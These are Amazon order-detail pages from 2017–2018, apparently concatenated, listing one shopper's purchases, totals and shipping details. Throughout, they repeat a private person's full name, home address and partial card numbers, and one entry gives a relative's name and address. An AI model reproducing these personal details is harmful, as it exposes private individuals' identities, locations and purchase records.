United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8658753-2744205 Order Placed: April 24, 2017 Amazon.com order number: 114-8658753-2744205 Order Total: $126.89 Shipped on April 25, 2017 Items Ordered Price 1 of: Kindle Paperwhite E-reader -Black, 6" High-Resolution Display (300 ppi) with $119.99 Built-in Light, Wi-Fi -Includes Special Offers Sold by: Amazon Digital Services, Inc. Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $119.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $119.99BRIAN J COADY Estimated tax to be collected: $6.901454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$126.89 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5333040-4742605 Order Placed: April 19, 2017 Amazon.com order number: 114-5333040-4742605 Order Total: $38.04 Shipped on April 19, 2017 Items Ordered Price 4 of: Swash 80240512 Pods Awaken Cups (12 Pack), Orange Sold by: Amazon.com Services LLC $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $35.96 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.99 Free Shipping: -$5.99 Billing address BRIAN J COADY Total before tax: $35.961454 MONROE ST NW Estimated tax to be collected: $2.08WASHINGTON, DC 20010 United States Grand Total:$38.04 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5337063-6277820 Order Placed: March 31, 2017 Amazon.com order number: 114-5337063-6277820 Order Total: $15.88 Shipped on April 1, 2017 Items Ordered Price 1 of: AKTIVX SPORTS LACES – No Tie Shoelaces that Lock – Replacement Elastic $5.89 Shoelaces, Athletic Laces for Running Gear Accessories, Mens Womens or Kids Shoes, Fitness Exercise Equipment (Cool Grey) Sold by: AKTIVX (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on April 1, 2017 Items Ordered Price 1 of: Xpand No Tie Shoelaces System with Elastic Laces -Maroon -One Size Fits All $9.99 Adult and Kids Shoes Sold by: Smooky Moon LLC (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $15.88 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $15.88 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$15.88 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-5495506-8626662 Order Placed: March 31, 2017 Amazon.com order number: 114-5495506-8626662 Order Total: $8.94 Shipped on April 1, 2017 Items Ordered Price 1 of: Cosmos ® 2 Inches Wide 10 Yards Black Nylon Heavy Webbing Strap with Cosmos Fastening Strap Sold by: Naviman (seller profile) $8.94 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $8.94 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $8.94BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$8.94 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #106-0986154-8517841 Subscribe and Save Order Placed: March 25, 2017 Amazon.com order number: 106-0986154-8517841 Order Total: $17.08 This order contains Subscribe & Save items. Shipped on April 1, 2017 Items Ordered Price 1 of: The Laundress Ironing Water, Classic, 16 ounce Sold by: Amazon.com Services LLC $17.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $17.00 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.85 Billing address Total before tax: $16.15BRIAN J COADY Estimated tax to be collected: $0.931454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$17.08 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-8608408-0739413 Order Placed: March 10, 2017 Amazon.com order number: 002-8608408-0739413 Order Total: $32.49 Shipped on March 11, 2017 Items Ordered Price 1 of: The Power of Now: A Guide to Spiritual Enlightenment, Tolle, Eckhart Sold by: Amazon.com Services LLC $8.89 Condition: New 1 of: A New Earth: Awakening to Your Life's Purpose (Oprah's Book Club, Selection 61), Eckhart Tolle Sold by: Amazon.com Services LLC $10.39 Condition: New 1 of: Stillness Speaks, Tolle, Eckhart Sold by: Amazon.com Services LLC $11.38 Condition: New Shipping Address: Andrew Coady 72602 8th ave. South Haven, MI 49090 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $30.66 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $30.66 BRIAN J COADY Estimated tax to be collected: $1.83 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$32.49 United States Final Details for Order #110-3955249-6429040 Order Placed: February 8, 2017 Amazon.com order number: 110-3955249-6429040 Order Total: $16.98 Shipped on February 9, 2017 Items Ordered Price 2 of: LE 51 LED UV Flashlight, Pet Urine and Stain Detector, Blacklight, 395nm, 3 AA Batteries Included Sold by: Lepro US (seller profile) | Product question? Ask Seller $8.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $16.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $16.98BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$16.98 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #110-1989930-1301847 Order Placed: February 5, 2017 Amazon.com order number: 110-1989930-1301847 Order Total: $32.80 Shipped on February 5, 2017 Items Ordered Price 1 of: Fitglam Pure Silk Sleep Mask + Reusable Cold / Hot Therapy SPA Gel Eye Mask Set -Improve Sleeping, Alleviate Puffy, Swollen Eyes, Fatigue, Headache and Tension (Lavender) Sold by: FITGLAM (seller profile) | Product question? Ask Seller $11.95 Condition: New 1 of: Bedtime Bliss BTB01 Contoured & Comfortable Sleep Mask Sold by: Deluxe Buys (seller profile) $12.90 Condition: New 1 of: Sleep-EZzzz Sleep Kit : 3D Sleep Mask, Travel Kit : Aids in dealing with Insomnia, Comes With Eye Covers, Ear Plugs, storage Bag, eBooks, and Lifetime Guarantee (Blue Mask) Sold by: Holtzman's Gorilla Survival (seller profile) $7.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $32.80 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $32.80 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$32.80 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #108-5637761-7975430 Order Placed: January 26, 2017 Amazon.com order number: 108-5637761-7975430 Order Total: $898.00 Shipped on January 26, 2017 Items Ordered Price 1 of: Sony Cyber-shot DSC-RX100 IV 20.1 MP Digital Still Camera, SONY $898.00 Sold by: OneCall (seller profile) Condition: New Authorized Dealer. Warranty and Award-winning Customer Service. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Grand Total:$898.00 Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $898.00 Shipping & Handling: $0.00 Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $898.00 Estimated tax to be collected: $0.00 WASHINGTON, DC 20010 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-0652357-7883413 Order Placed: January 26, 2017 Amazon.com order number: 108-0652357-7883413 Order Total: $76.12 Shipped on January 26, 2017 Items Ordered Price 1 of: 4 Year Camera Accident Protection Plan ($800-900) Sold by: Warrantech (seller profile) $71.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $71.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $71.98 BRIAN J COADY Estimated tax to be collected: $4.141454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$76.12 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-0587897-9285054 Order Placed: January 26, 2017 Amazon.com order number: 108-0587897-9285054 Order Total: $2.75 Shipped on January 27, 2017 Items Ordered Price 1 of: Sinsun 20pcs Stainless Steel Wire Keychain Cable Key Ring for Outdoor Hiking Sold by: leazeey (seller profile) $2.75 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $2.75 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $2.75 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$2.75 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-4921163-1700244 Order Placed: January 19, 2017 Amazon.com order number: 108-4921163-1700244 Order Total: $125.23 Shipped on January 19, 2017 Items Ordered 1 of: Tile Mate Key Finder, Phone Finder, 4-pack Sold by: Amazon.com Services LLC Price $64.54 Condition: New 2 of: MECO Hand Cranking Solar Powered Rechargeable Flashlight Emergency LED Flashlight Carabiner Dynamo w/ Quick Snap Clip Backpack Flashlight Torch Weather Ready for Camping Outdoor Climbing Hiking Sold by: TopMall (seller profile) | Product question? Ask Seller $9.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 20, 2017 Items Ordered 1 of: LifeStraw Go Water Bottle 1-Stage with Integrated 1000-Liter LifeStraw Filter, Blue Sold by: Amazon.com Services LLC Price $34.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Print this page for your records. Payment information Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $119.51 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $119.51 Estimated tax to be collected: $5.72 ---- WASHINGTON, DC 20010 Grand Total:$125.23 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #110-9206184-2237064 Order Placed: January 8, 2017 Amazon.com order number: 110-9206184-2237064 Order Total: $47.53 Shipped on January 8, 2017 Items Ordered Price 1 of: LifeStraw Go Water Bottle 2-Stage with Integrated 1,000 Liter LifeStraw Filter and Activated Carbon, Blue Sold by: Amazon.com Services LLC $44.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $44.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.99 Free Shipping: -$5.99 Billing address BRIAN J COADY Total before tax: $44.951454 MONROE ST NW Estimated tax to be collected: $2.58WASHINGTON, DC 20010 United States Grand Total:$47.53 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #110-7569691-9549844 Order Placed: January 8, 2017 Amazon.com order number: 110-7569691-9549844 Order Total: $101.80 Shipped on January 9, 2017 Items Ordered Price 1 of: Potable Aqua Water Purification Tablets with PA Plus, Potable Aqua $10.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 10, 2017 Items Ordered Price 1 of: Billabong Men's Carter Submersible Short, Asphalt, 32 $44.95 Sold by: BC Surf & Sport (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 9, 2017 Items Ordered Price Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $98.71 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $98.71BRIAN J COADY Estimated tax to be collected: $3.091454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$101.80 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #110-5194679-0805862 Order Placed: January 8, 2017 Amazon.com order number: 110-5194679-0805862 Order Total: $4.05 Shipped on January 9, 2017 Items Ordered Price 1 of: P-38 Can Opener and P-51 Can Opener Sold by: Ozark Outdoorz, LLC (seller profile) $4.05 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $4.05 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $4.05 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$4.05 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-9993337-0436243 Subscribe and Save Order Placed: December 25, 2018 Amazon.com order number: 113-9993337-0436243 Order Total: $9.53 This order contains Subscribe & Save items. Shipped on January 2, 2019 Items Ordered Price 1 of: Swash 80240514 Pods Unwind Cups (12 Pack), Purple Sold by: Amazon.com Services LLC $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Chilled Shipping Payment information Payment Method: Item(s) Subtotal: $8.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $8.99BRIAN J COADY Estimated tax to be collected: $0.54 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$9.53 United States Credit Card transactions AmazonPLCC ending in 3157: January 2, 2019:$9.53 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9183433-7619415 Order Placed: December 22, 2018 Amazon.com order number: 114-9183433-7619415 Order Total: $59.99 Shipped on December 23, 2018 Items Ordered Price 1 of: Pawriffic Folding Pet Steps Convertible to Ramp -Mobility Support for Dogs and Cats -Wooed with Mahogany Finish Sold by: Order Box Products (USA Merchant) (seller profile) $59.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $59.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $59.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$59.99 United States Credit Card transactions AmazonPLCC ending in 3157: December 23, 2018:$59.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5429594-1829004 Order Placed: December 13, 2018 Amazon.com order number: 114-5429594-1829004 Order Total: $40.88 Shipped on December 14, 2018 Items Ordered Price 1 of: RakrisaSupplies Purple Bags Pack of 15 | Natural Deodorizer, Moth Repellent, Highest Fragrance Lavender Scent Sachets | LS-001 Sold by: Rakrisa & Co (seller profile) $14.90 Condition: New 1 of: MOPOLIS Cut Resistant Gloves Level 5 Hand Protection Food Grade Kitchen Work $12.99 Safety Gloves for Cutting and Slicing, Wood Carving, Cut Proof Knife Resistant Gloves All Sizes 1 Pair Grey (Large) Sold by: MOPOLIS (seller profile) Condition: New 1 of: ALASKA BEAR -Natural Silk Gloves Thermal Liner Unisex $12.99 Sold by: Alaska Bear (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $40.88 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $40.88 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$40.88 United States Credit Card transactions AmazonPLCC ending in 3157: December 14, 2018:$40.88 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-3386091-4642635 Order Placed: December 5, 2018 Amazon.com order number: 114-3386091-4642635 Order Total: $140.68 Shipped on December 7, 2018 Items Ordered 1 of: Columbia Men's Silver Ridge Stretch Pants, Whale, 34 x 30 Sold by: Amazon.com Services LLC Price $24.33 Condition: New 1 of: Bosch GBL 18V-120 18v Professional Cordless Blower – Bare Unit Sold by: Bros International (seller profile) | Product question? Ask Seller $94.90 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 6, 2018 Items Ordered 1 of: Indoor 10 Window Insulation Kit 62" x 420" Shrink Insulator Film Plastics Windows Kits Patio Door Seal Wrap Weatherization Film Sold by: Fowong (seller profile) Price $19.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Print this page for your records. Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $139.22 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $139.22 Estimated tax to be collected: $1.46 ---- WASHINGTON, DC 20010 Grand Total:$140.68 United States Credit Card transactions AmazonPLCC ending in 3157: December 7, 2018:$140.68 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3179197-0885019 Order Placed: December 5, 2018 Amazon.com order number: 114-3179197-0885019 Order Total: $19.28 Shipped on December 6, 2018 Items Ordered Price 1 of: Columbia Men's Silver Ridge Stretch Pants, Dark Mountain, 34x30 Sold by: Amazon.com Services LLC $18.19 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $18.19 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $18.19 BRIAN J COADY Estimated tax to be collected: $1.091454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$19.28 United States Credit Card transactions AmazonPLCC ending in 3157: December 6, 2018:$19.28 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6451911-0193820 Order Placed: December 4, 2018 Amazon.com order number: 114-6451911-0193820 Order Total: $19.99 Shipped on December 5, 2018 Items Ordered Price 1 of: Indoor 10 Window Insulation Kit 62" x 420" Shrink Insulator Film Plastics Windows Kits Patio Door Seal Wrap Weatherization Film Sold by: Fowong (seller profile) $19.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $19.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $19.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$19.99 United States Credit Card transactions AmazonPLCC ending in 3157: December 5, 2018:$19.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3843565-4084216 Order Placed: November 27, 2018 Amazon.com order number: 114-3843565-4084216 Order Total: $41.26 Shipped on November 30, 2018 Items Ordered Price 1 of: Batmax 4Packs NP-BX1 Battery (1600mAh) and LCD Dual USB Charger for Sony $23.99 NP BX1/M8, Cyber-shot DSC-HX80, RX1, RX1R, RX100, RX1RII, H400, HX300, HX50V, HX90V, WX300, WX350, HDR-AS10 Cameras Sold by: Batmaxusa (seller profile) Condition: New 1 of: co2crea Hard Travel Case for Sony Cyber-Shot DSC-RX100 III IV V VI Digital Still $17.99 Camera and Vct Camera Grip Sold by: co2crea shop (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $41.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Promotion Applied: -$0.72 Billing address BRIAN J COADY Total before tax: $41.26 1454 MONROE ST NW Estimated tax to be collected: $0.00 WASHINGTON, DC 20010 United States Grand Total:$41.26 Credit Card transactions AmazonPLCC ending in 3157: November 30, 2018:$41.26 Final Details for Order #114-2987218-1781024 Order Placed: November 27, 2018 Amazon.com order number: 114-2987218-1781024 Order Total: $59.95 Shipped on November 27, 2018 Items Ordered Price 1 of: Sony Cyber-Shot DSC-RX100 IV & DSC-RX100 V High Grade Multi-Coated, Multi-$59.95 Threaded, 3 Piece Lens Filter Kit + Filter Adapter + Krusell Multidapt Neck Strap Sold by: New West Direct (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $59.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $59.95BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$59.95 United States Credit Card transactions AmazonPLCC ending in 3157: November 27, 2018:$59.95 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2857262-6509031 Subscribe and Save Order Placed: November 24, 2018 Amazon.com order number: 114-2857262-6509031 Order Total: $9.53 This order contains Subscribe & Save items. Shipped on December 3, 2018 Items Ordered Price 1 of: Swash 80240514 Pods Unwind Cups (12 Pack), Purple Sold by: Amazon.com Services LLC $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Chilled Shipping Payment information Payment Method: Item(s) Subtotal: $8.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $8.99BRIAN J COADY Estimated tax to be collected: $0.54 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$9.53 United States Credit Card transactions AmazonPLCC ending in 3157: December 3, 2018:$9.53 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5539450-6057019 Order Placed: November 23, 2018 Amazon.com order number: 114-5539450-6057019 Order Total: $29.11 Shipped on November 25, 2018 Items Ordered 1 of: Bosch MS4041 41-Piece Drill and Drive Bit Set Sold by: Amazon.com Services LLC Condition: New Price $12.48 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on November 25, 2018 Items Ordered 1 of: Bosch 20 Piece Impact Tough Drill Driver Custom Case System Set DDMS20 Sold by: Amazon.com Services LLC Condition: New Price $14.98 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Print this page for your records. Payment Method: Item(s) Subtotal: $27.46 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $27.46 BRIAN J COADY Estimated tax to be collected: $1.65 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$29.11 United States Credit Card transactions AmazonPLCC ending in 3157: November 25, 2018:$29.11 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-9107761-5707457 Order Placed: November 12, 2018 Amazon.com order number: 114-9107761-5707457 Order Total: $10.76 Shipped on November 13, 2018 Items Ordered Price 1 of: SC PACK 3/16" 700 ft x 12"Small Bubble Cushioning Wrap, Perforated Every 12 (4 Rolls X 175 = 700 feet) Sold by: American Bubble Boy (seller profile) $34.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $34.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Total before tax: $34.99Billing address Estimated tax to be collected: $0.00BRIAN J COADY Gift Card Amount:-$24.23 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$10.76 United States Credit Card transactions AmazonPLCC ending in 3157: November 13, 2018:$10.76 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5238841-5973039 Order Placed: November 7, 2018 Amazon.com order number: 114-5238841-5973039 Order Total: $0.00 Shipped on November 13, 2018 Items Ordered Price 4 of: Swash 80240512 Pods Awaken Cups (12 Pack), Orange Sold by: Amazon.com Services LLC $8.99 Condition: New 4 of: Swash 80240514 Pods Unwind Cups (12 Pack), Purple Sold by: Amazon.com Services LLC $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $71.92 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Total before tax: $71.92Billing address Estimated tax to be collected: $4.32BRIAN J COADY Gift Card Amount:-$76.24 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2321746-8462619 Order Placed: October 23, 2018 Amazon.com order number: 114-2321746-8462619 Order Total: $53.85 Shipped on October 26, 2018 Items Ordered Price 1 of: RakrisaSupplies Purple Bags Pack of 15 | Natural Deodorizer, Moth Repellent, Highest Fragrance Lavender Scent Sachets | LS-001 Sold by: Rakrisa & Co (seller profile) $16.90 Condition: New 1 of: POWERFUL MOTH TRAPS FOR CLOTHES MOTHS | Odor-free & Natural | Best Catch-Rate for Clothes Moth and Carpet Moth Traps on the Market! | 3-Pack from MothPrevention -Results Guaranteed Sold by: West Bay Retail Inc (seller profile) $36.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $53.85 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $53.85 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$53.85 United States Credit Card transactions AmazonPLCC ending in 3157: October 26, 2018:$53.85 Final Details for Order #114-0444470-5513801 Order Placed: October 8, 2018 Amazon.com order number: 114-0444470-5513801 Order Total: $38.12 Shipped on October 9, 2018 Items Ordered Price 4 of: SWASH Outlast Scented POD Cups Sold by: Amazon.com Services LLC $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $35.96 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $35.96 BRIAN J COADY Estimated tax to be collected: $2.161454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$38.12 United States Credit Card transactions AmazonPLCC ending in 3157: October 9, 2018:$38.12 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2290723-0537802 Order Placed: September 26, 2018 Amazon.com order number: 114-2290723-0537802 Order Total: $30.00 Shipped on September 27, 2018 Items Ordered Price 1 of: Asbestos Test Kit 1 PK (5 Bus. Days) Schneider Labs Sold by: SLGI (seller profile) $30.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $30.00 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $30.00 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$30.00 United States Credit Card transactions AmazonPLCC ending in 3157: September 27, 2018:$30.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order 